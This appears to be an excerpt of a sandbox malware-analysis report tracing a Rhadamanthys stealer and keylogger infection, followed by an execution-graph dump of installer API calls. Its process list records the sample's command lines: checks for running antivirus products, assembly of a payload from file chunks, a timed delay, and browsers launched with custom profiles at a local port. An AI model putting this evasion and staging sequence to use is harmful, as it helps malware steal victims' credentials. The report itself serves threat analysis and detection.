Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x930000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:08:54:46
Start date:18/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "wrsa opssvc"
Imagebase:0x250000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:6
Start time:08:54:47
Start date:18/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0x930000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:08:54:47
Start date:18/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x250000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:08:54:47
Start date:18/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 407310
Imagebase:0xc30000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:08:54:47
Start date:18/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Tall + ..\Compensation + ..\Limited + ..\Pasta + ..\Patricia + ..\Mac + ..\Terminal + ..\Roommate + ..\Pts + ..\Andorra B
Imagebase:0xc30000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:10
Start time:08:54:47
Start date:18/12/2024
Path:C:\Users\user\AppData\Local\Temp\407310\Hop.com
Wow64 process (32bit):false
Commandline:Hop.com B
Imagebase:0x7ff68c430000
File size:1'065'128 bytes
MD5 hash:C63860691927D62432750013B5A20F5F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 0%, ReversingLabs
Reputation:moderate
Has exited:true

Target ID:11
Start time:08:54:48
Start date:18/12/2024
Path:C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):true
Commandline:choice /d y /t 5
Imagebase:0x570000
File size:28'160 bytes
MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:12
Start time:08:54:59
Start date:18/12/2024
Path:C:\Users\user\AppData\Local\Temp\407310\Hop.com
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\407310\Hop.com
Imagebase:0x7ff68c430000
File size:1'065'128 bytes
MD5 hash:C63860691927D62432750013B5A20F5F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:14
Start time:08:55:00
Start date:18/12/2024
Path:C:\Users\user\AppData\Local\Temp\407310\Hop.com
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\407310\Hop.com
Imagebase:0x7ff68c430000
File size:1'065'128 bytes
MD5 hash:C63860691927D62432750013B5A20F5F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000003.1669870508.0000024368900000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000003.1669666676.0000024368620000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:15
Start time:08:55:06
Start date:18/12/2024
Path:C:\Windows\System32\svchost.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\svchost.exe"
Imagebase:0x7ff68dea0000
File size:55'320 bytes
MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1676222039.000001C2785C0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000F.00000003.1675987126.000001C2782E0000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:true

Target ID:18
Start time:08:55:07
Start date:18/12/2024
Path:C:\Windows\System32\WerFault.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\WerFault.exe -u -p 4120 -s 340
Imagebase:0x7ff754190000
File size:570'736 bytes
MD5 hash:FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:19
Start time:08:55:24
Start date:18/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr992.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/14c90ac5"
Imagebase:0x7ff6a3150000
File size:3'242'272 bytes
MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:21
Start time:08:55:25
Start date:18/12/2024
Path:C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2268,i,5510077771295521084,16887318193835122757,262144 /prefetch:8
Imagebase:0x7ff6a3150000
File size:3'242'272 bytes
MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:22
Start time:08:55:26
Start date:18/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline: --user-data-dir="C:\Users\user\AppData\Local\Temp\chr1078.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/254d3199/72f3a0b3"
Imagebase:0x7ff740fe0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:25
Start time:08:55:28
Start date:18/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --explicitly-allowed-ports=8000 --disable-gpu --new-window --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate http://127.0.0.1:8000/254d3199/72f3a0b3
Imagebase:0x7ff740fe0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:26
Start time:08:55:28
Start date:18/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2036,i,6499210504756038714,13868593157593711186,262144 /prefetch:3
Imagebase:0x7ff740fe0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:27
Start time:08:55:29
Start date:18/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:3
Imagebase:0x7ff740fe0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:30
Start time:08:55:32
Start date:18/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5092 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
Imagebase:0x7ff740fe0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:31
Start time:08:55:32
Start date:18/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=2952 --field-trial-handle=2020,i,7653490284307282906,3633221050828956869,262144 /prefetch:8
Imagebase:0x7ff740fe0000
File size:4'210'216 bytes
MD5 hash:69222B8101B0601CC6663F8381E7E00F
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Has exited:true

Target ID:32
Start time:08:55:32
Start date:18/12/2024
Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):false
Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window /prefetch:5
Imagebase:0x7ff740fe0000
File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        Target ID:33
                                                                                                                                                                                                                                                                                                        Start time:08:55:33
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:3
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        Target ID:34
                                                                                                                                                                                                                                                                                                        Start time:08:55:34
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4444 --field-trial-handle=2020,i,16293265781857816472,11424669935226170207,262144 /prefetch:8
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff740fe0000
                                                                                                                                                                                                                                                                                                        File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                                        Has elevated privileges:false
                                                                                                                                                                                                                                                                                                        Has administrator privileges:false
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        Target ID:35
                                                                                                                                                                                                                                                                                                        Start time:08:55:51
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Program Files\Windows Media Player\wmplayer.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Program Files\Windows Media Player\wmplayer.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff668750000
                                                                                                                                                                                                                                                                                                        File size:171'008 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:89DCD2D4C0EC638AADC00D3530E07E1D
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

                                                                                                                                                                                                                                                                                                        Target ID:36
                                                                                                                                                                                                                                                                                                        Start time:08:55:56
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\dllhost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\system32\dllhost.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff7782e0000
                                                                                                                                                                                                                                                                                                        File size:21'312 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Has exited:false

Execution Graph

Execution Coverage:17.7%
Dynamic/Decrypted Code Coverage:0%
Signature Coverage:21%
Total number of Nodes:1482
Total number of Limit Nodes:28
CloseHandle 3723->3726 3771 403dc4 SendMessageW 3724->3771 3728 405320 3725->3728 3730 405342 3725->3730 3731 40530c ShowWindow ShowWindow 3725->3731 3726->3725 3774 405073 OleInitialize 3726->3774 3732 40537e 3728->3732 3734 405331 3728->3734 3735 405357 ShowWindow 3728->3735 3729 40518e 3741 406831 18 API calls 3729->3741 3736 403df6 8 API calls 3730->3736 3773 403dc4 SendMessageW 3731->3773 3732->3730 3737 405389 SendMessageW 3732->3737 3738 403d44 SendMessageW 3734->3738 3739 405377 3735->3739 3740 405369 3735->3740 3746 4052ba 3736->3746 3745 4053a2 CreatePopupMenu 3737->3745 3737->3746 3738->3730 3744 403d44 SendMessageW 3739->3744 3742 404f9e 25 API calls 3740->3742 3743 4051ad 3741->3743 3742->3739 3747 4062cf 11 API calls 3743->3747 3744->3732 3748 406831 18 API calls 3745->3748 3749 4051b8 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3747->3749 3750 4053b2 AppendMenuW 3748->3750 3751 405203 SendMessageW SendMessageW 3749->3751 3752 40521f 3749->3752 3753 4053c5 GetWindowRect 3750->3753 3754 4053d8 3750->3754 3751->3752 3755 405232 3752->3755 3756 405224 SendMessageW 3752->3756 3757 4053df TrackPopupMenu 3753->3757 3754->3757 3758 403d6b 19 API calls 3755->3758 3756->3755 3757->3746 3759 4053fd 3757->3759 3760 405242 3758->3760 3761 405419 SendMessageW 3759->3761 3762 40524b ShowWindow 3760->3762 3763 40527f GetDlgItem SendMessageW 3760->3763 3761->3761 3764 405436 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3761->3764 3765 405261 ShowWindow 3762->3765 3766 40526e 3762->3766 3763->3746 3767 4052a2 SendMessageW SendMessageW 3763->3767 3768 40545b SendMessageW 3764->3768 3765->3766 3772 403dc4 SendMessageW 3766->3772 3767->3746 3768->3768 3769 405486 GlobalUnlock SetClipboardData CloseClipboard 3768->3769 3769->3746 3771->3729 3772->3763 3773->3728 3775 403ddb SendMessageW 3774->3775 3779 405096 3775->3779 3776 403ddb SendMessageW 3777 4050d1 OleUninitialize 3776->3777 3778 4062cf 11 API calls 3778->3779 3779->3778 3780 40139d 80 API 
calls 3779->3780 3781 4050c1 3779->3781 3780->3779 3781->3776 4634 4020f9 GetDC GetDeviceCaps 4635 401446 18 API calls 4634->4635 4636 402116 MulDiv 4635->4636 4637 401446 18 API calls 4636->4637 4638 40212c 4637->4638 4639 406831 18 API calls 4638->4639 4640 402165 CreateFontIndirectW 4639->4640 4641 4030dc 4640->4641 4642 4030e3 4641->4642 4644 405f7d wsprintfW 4641->4644 4644->4642 4645 4024fb 4646 40145c 18 API calls 4645->4646 4647 402502 4646->4647 4648 40145c 18 API calls 4647->4648 4649 40250c 4648->4649 4650 40145c 18 API calls 4649->4650 4651 402515 4650->4651 4652 40145c 18 API calls 4651->4652 4653 40251f 4652->4653 4654 40145c 18 API calls 4653->4654 4655 402529 4654->4655 4656 40253d 4655->4656 4657 40145c 18 API calls 4655->4657 4658 4062cf 11 API calls 4656->4658 4657->4656 4659 40256a CoCreateInstance 4658->4659 4660 40258c 4659->4660 4661 4026fc 4663 402708 4661->4663 4664 401ee4 4661->4664 4662 406831 18 API calls 4662->4664 4664->4661 4664->4662 3808 4019fd 3809 40145c 18 API calls 3808->3809 3810 401a04 3809->3810 3813 405eab 3810->3813 3814 405eb8 GetTickCount GetTempFileNameW 3813->3814 3815 401a0b 3814->3815 3816 405eee 3814->3816 3816->3814 3816->3815 4665 4022fd 4666 40145c 18 API calls 4665->4666 4667 402304 GetFileVersionInfoSizeW 4666->4667 4668 4030e3 4667->4668 4669 40232b GlobalAlloc 4667->4669 4669->4668 4670 40233f GetFileVersionInfoW 4669->4670 4671 402350 VerQueryValueW 4670->4671 4672 402381 GlobalFree 4670->4672 4671->4672 4673 402369 4671->4673 4672->4668 4678 405f7d wsprintfW 4673->4678 4676 402375 4679 405f7d wsprintfW 4676->4679 4678->4676 4679->4672 4680 402afd 4681 40145c 18 API calls 4680->4681 4682 402b04 4681->4682 4687 405e7c GetFileAttributesW CreateFileW 4682->4687 4684 402b10 4685 4030e3 4684->4685 4688 405f7d wsprintfW 4684->4688 4687->4684 4688->4685 4689 4029ff 4690 401553 19 API calls 4689->4690 4691 402a09 4690->4691 4692 40145c 18 API calls 4691->4692 4693 402a12 4692->4693 4694 402a1f RegQueryValueExW 
4693->4694 4698 401a13 4693->4698 4695 402a45 4694->4695 4696 402a3f 4694->4696 4697 4029e4 RegCloseKey 4695->4697 4695->4698 4696->4695 4700 405f7d wsprintfW 4696->4700 4697->4698 4700->4695 4701 401000 4702 401037 BeginPaint GetClientRect 4701->4702 4703 40100c DefWindowProcW 4701->4703 4705 4010fc 4702->4705 4706 401182 4703->4706 4707 401073 CreateBrushIndirect FillRect DeleteObject 4705->4707 4708 401105 4705->4708 4707->4705 4709 401170 EndPaint 4708->4709 4710 40110b CreateFontIndirectW 4708->4710 4709->4706 4710->4709 4711 40111b 6 API calls 4710->4711 4711->4709 4712 401f80 4713 401446 18 API calls 4712->4713 4714 401f88 4713->4714 4715 401446 18 API calls 4714->4715 4716 401f93 4715->4716 4717 401fa3 4716->4717 4718 40145c 18 API calls 4716->4718 4719 401fb3 4717->4719 4720 40145c 18 API calls 4717->4720 4718->4717 4721 402006 4719->4721 4722 401fbc 4719->4722 4720->4719 4723 40145c 18 API calls 4721->4723 4724 401446 18 API calls 4722->4724 4725 40200d 4723->4725 4726 401fc4 4724->4726 4728 40145c 18 API calls 4725->4728 4727 401446 18 API calls 4726->4727 4729 401fce 4727->4729 4730 402016 FindWindowExW 4728->4730 4731 401ff6 SendMessageW 4729->4731 4732 401fd8 SendMessageTimeoutW 4729->4732 4734 402036 4730->4734 4731->4734 4732->4734 4733 4030e3 4734->4733 4736 405f7d wsprintfW 4734->4736 4736->4733 4737 402880 4738 402884 4737->4738 4739 40145c 18 API calls 4738->4739 4740 4028a7 4739->4740 4741 40145c 18 API calls 4740->4741 4742 4028b1 4741->4742 4743 4028ba RegCreateKeyExW 4742->4743 4744 4028e8 4743->4744 4749 4029ef 4743->4749 4745 402934 4744->4745 4747 40145c 18 API calls 4744->4747 4746 402963 4745->4746 4748 401446 18 API calls 4745->4748 4750 4029ae RegSetValueExW 4746->4750 4753 40337f 33 API calls 4746->4753 4751 4028fc lstrlenW 4747->4751 4752 402947 4748->4752 4756 4029c6 RegCloseKey 4750->4756 4757 4029cb 4750->4757 4754 402918 4751->4754 4755 40292a 4751->4755 4759 4062cf 11 API calls 4752->4759 4760 40297b 4753->4760 4761 4062cf 11 
API calls 4754->4761 4762 4062cf 11 API calls 4755->4762 4756->4749 4758 4062cf 11 API calls 4757->4758 4758->4756 4759->4746 4768 406250 4760->4768 4765 402922 4761->4765 4762->4745 4765->4750 4767 4062cf 11 API calls 4767->4765 4769 406273 4768->4769 4770 4062b6 4769->4770 4771 406288 wsprintfW 4769->4771 4772 402991 4770->4772 4773 4062bf lstrcatW 4770->4773 4771->4770 4771->4771 4772->4767 4773->4772 4774 403d02 4775 403d0d 4774->4775 4776 403d11 4775->4776 4777 403d14 GlobalAlloc 4775->4777 4777->4776 4778 402082 4779 401446 18 API calls 4778->4779 4780 402093 SetWindowLongW 4779->4780 4781 4030e3 4780->4781 4782 402a84 4783 401553 19 API calls 4782->4783 4784 402a8e 4783->4784 4785 401446 18 API calls 4784->4785 4786 402a98 4785->4786 4787 401a13 4786->4787 4788 402ab2 RegEnumKeyW 4786->4788 4789 402abe RegEnumValueW 4786->4789 4790 402a7e 4788->4790 4789->4787 4789->4790 4790->4787 4791 4029e4 RegCloseKey 4790->4791 4791->4787 4792 402c8a 4793 402ca2 4792->4793 4794 402c8f 4792->4794 4796 40145c 18 API calls 4793->4796 4795 401446 18 API calls 4794->4795 4798 402c97 4795->4798 4797 402ca9 lstrlenW 4796->4797 4797->4798 4799 401a13 4798->4799 4800 402ccb WriteFile 4798->4800 4800->4799 4801 401d8e 4802 40145c 18 API calls 4801->4802 4803 401d95 ExpandEnvironmentStringsW 4802->4803 4804 401da8 4803->4804 4805 401db9 4803->4805 4804->4805 4806 401dad lstrcmpW 4804->4806 4806->4805 4807 401e0f 4808 401446 18 API calls 4807->4808 4809 401e17 4808->4809 4810 401446 18 API calls 4809->4810 4811 401e21 4810->4811 4812 4030e3 4811->4812 4814 405f7d wsprintfW 4811->4814 4814->4812 4815 40438f 4816 4043c8 4815->4816 4817 40439f 4815->4817 4818 403df6 8 API calls 4816->4818 4819 403d6b 19 API calls 4817->4819 4821 4043d4 4818->4821 4820 4043ac SetDlgItemTextW 4819->4820 4820->4816 4822 403f90 4823 403fa0 4822->4823 4824 403fbc 4822->4824 4833 405cb0 GetDlgItemTextW 4823->4833 4826 403fc2 SHGetPathFromIDListW 4824->4826 4827 403fef 4824->4827 4829 403fd2 4826->4829 4832 
403fd9 SendMessageW 4826->4832 4828 403fad SendMessageW 4828->4824 4830 40141d 80 API calls 4829->4830 4830->4832 4832->4827 4833->4828 4834 402392 4835 40145c 18 API calls 4834->4835 4836 402399 4835->4836 4839 407224 4836->4839 4840 406efe 25 API calls 4839->4840 4841 407244 4840->4841 4842 4023a7 4841->4842 4843 40724e lstrcpynW lstrcmpW 4841->4843 4844 407280 4843->4844 4845 407286 lstrcpynW 4843->4845 4844->4845 4845->4842 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3403 406113 3360->3403 3372 40683e 3363->3372 3364 406aab 3365 401488 3364->3365 3398 406035 lstrcpynW 3364->3398 3365->3358 3382 406064 3365->3382 3367 4068ff GetVersion 3377 40690c 3367->3377 3368 406a72 lstrlenW 3368->3372 3370 406831 10 API calls 3370->3368 3372->3364 3372->3367 3372->3368 3372->3370 3375 406064 5 API calls 3372->3375 3396 405f7d wsprintfW 3372->3396 3397 406035 lstrcpynW 3372->3397 3374 40697e GetSystemDirectoryW 3374->3377 3375->3372 3376 406991 GetWindowsDirectoryW 3376->3377 3377->3372 3377->3374 3377->3376 3378 406831 10 API calls 3377->3378 3379 406a0b lstrcatW 3377->3379 3380 4069c5 SHGetSpecialFolderLocation 3377->3380 3391 405eff RegOpenKeyExW 3377->3391 3378->3377 3379->3372 3380->3377 3381 4069dd SHGetPathFromIDListW CoTaskMemFree 3380->3381 3381->3377 3389 406071 3382->3389 3383 4060e7 3384 4060ed CharPrevW 3383->3384 3386 40610d 3383->3386 3384->3383 3385 4060da CharNextW 3385->3383 3385->3389 3386->3358 3388 4060c6 CharNextW 3388->3389 3389->3383 3389->3385 3389->3388 3390 4060d5 CharNextW 3389->3390 3399 405d32 3389->3399 3390->3385 3392 405f33 RegQueryValueExW 3391->3392 3393 
405f78 3391->3393 3394 405f55 RegCloseKey 3392->3394 3393->3377 3394->3393 3396->3372 3397->3372 3398->3365 3400 405d38 3399->3400 3401 405d4e 3400->3401 3402 405d3f CharNextW 3400->3402 3401->3389 3402->3400 3404 40613c 3403->3404 3405 40611f 3403->3405 3407 4061b3 3404->3407 3408 406159 3404->3408 3409 40277f WritePrivateProfileStringW 3404->3409 3406 406129 CloseHandle 3405->3406 3405->3409 3406->3409 3407->3409 3410 4061bc lstrcatW lstrlenW WriteFile 3407->3410 3408->3410 3411 406162 GetFileAttributesW 3408->3411 3410->3409 3416 405e7c GetFileAttributesW CreateFileW 3411->3416 3413 40617e 3413->3409 3414 4061a8 SetFilePointer 3413->3414 3415 40618e WriteFile 3413->3415 3414->3407 3415->3414 3416->3413 4846 402797 4847 40145c 18 API calls 4846->4847 4848 4027ae 4847->4848 4849 40145c 18 API calls 4848->4849 4850 4027b7 4849->4850 4851 40145c 18 API calls 4850->4851 4852 4027c0 GetPrivateProfileStringW lstrcmpW 4851->4852 4853 401e9a 4854 40145c 18 API calls 4853->4854 4855 401ea1 4854->4855 4856 401446 18 API calls 4855->4856 4857 401eab wsprintfW 4856->4857 3817 401a1f 3818 40145c 18 API calls 3817->3818 3819 401a26 3818->3819 3820 4062cf 11 API calls 3819->3820 3821 401a49 3820->3821 3822 401a64 3821->3822 3823 401a5c 3821->3823 3892 406035 lstrcpynW 3822->3892 3891 406035 lstrcpynW 3823->3891 3826 401a6f 3893 40674e lstrlenW CharPrevW 3826->3893 3827 401a62 3830 406064 5 API calls 3827->3830 3861 401a81 3830->3861 3831 406301 2 API calls 3831->3861 3834 401a98 CompareFileTime 3834->3861 3835 401ba9 3836 404f9e 25 API calls 3835->3836 3838 401bb3 3836->3838 3837 401b5d 3839 404f9e 25 API calls 3837->3839 3870 40337f 3838->3870 3841 401b70 3839->3841 3845 4062cf 11 API calls 3841->3845 3843 406035 lstrcpynW 3843->3861 3844 4062cf 11 API calls 3846 401bda 3844->3846 3850 401b8b 3845->3850 3847 401be9 SetFileTime 3846->3847 3848 401bf8 CloseHandle 3846->3848 3847->3848 3848->3850 3851 401c09 3848->3851 3849 406831 18 API calls 3849->3861 3852 401c21 3851->3852 
